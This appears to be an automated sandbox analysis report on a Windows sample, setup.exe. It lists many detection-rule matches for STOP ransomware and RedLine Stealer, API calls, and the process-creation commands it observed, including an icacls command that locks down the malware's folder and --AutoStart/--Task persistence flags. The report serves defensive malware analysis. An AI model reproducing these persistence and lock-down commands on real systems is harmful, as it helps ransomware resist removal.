        Source: 0.2.setup.exe.20115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0.2.setup.exe.20115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 2.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 2.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 5.2.setup.exe.20715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 5.2.setup.exe.20715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 12.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 12.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 11.2.setup.exe.20d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 11.2.setup.exe.20d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 5.2.setup.exe.20715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 5.2.setup.exe.20715a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 12.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 12.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0.2.setup.exe.20115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0.2.setup.exe.20115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 16.2.setup.exe.20b15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 16.2.setup.exe.20b15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 2.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 2.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 17.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 17.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 7.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 7.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 16.2.setup.exe.20b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 16.2.setup.exe.20b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000000.00000002.2088895615.0000000001F3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000005.00000002.2127962943.000000000064A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 0000000B.00000002.2245296367.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000010.00000002.2324127923.0000000002016000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: Process Memory Space: setup.exe PID: 3604, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: setup.exe PID: 6316, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: setup.exe PID: 6864, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: setup.exe PID: 7036, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: setup.exe PID: 5252, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: setup.exe PID: 4232, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: setup.exe PID: 6416, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: setup.exe PID: 3816, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: setup.exeStatic PE information: Section: .data ZLIB complexity 0.9914348891730606
        Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@19/1330@3/2
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,2_2_00411900
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01F3C7C6 CreateToolhelp32Snapshot,Module32First,0_2_01F3C7C6
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\geo[1].jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: msimg32.dll0_2_00405BE0
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: msimg32.dll0_2_00405BE0
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: *gA0_2_00405BE0
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: *gA0_2_00405BE0
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --Admin2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: IsAutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: IsTask2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --ForNetRes2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: IsAutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: IsTask2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --Task2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --AutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --Service2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: X1P2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --Admin2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: runas2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: x2Q2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: x*P2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: C:\Windows\2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: D:\Windows\2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: 7P2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: %username%2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: F:\2_2_00419F90
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCommand line argument: *gA6_2_00405BE0
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --Admin7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: IsAutoStart7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: IsTask7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --ForNetRes7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: IsAutoStart7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: IsTask7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --Task7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --AutoStart7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --Service7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: X1P7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: --Admin7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: runas7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: x2Q7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: x*P7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: C:\Windows\7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: D:\Windows\7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: 7P7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: %username%7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: F:\7_2_00419F90
        Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: setup.exeReversingLabs: Detection: 89%
        Source: setup.exeString found in binary or memory: set-addPolicy
        Source: setup.exeString found in binary or memory: id-cmc-addExtensions
        Source: setup.exeString found in binary or memory: set-addPolicy
        Source: setup.exeString found in binary or memory: id-cmc-addExtensions
        Source: setup.exeString found in binary or memory: set-addPolicy
        Source: setup.exeString found in binary or memory: id-cmc-addExtensions
        Source: setup.exeString found in binary or memory: set-addPolicy
        Source: setup.exeString found in binary or memory: id-cmc-addExtensions
        Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTask
        Source: unknownProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe --Task
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTask
        Source: unknownProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
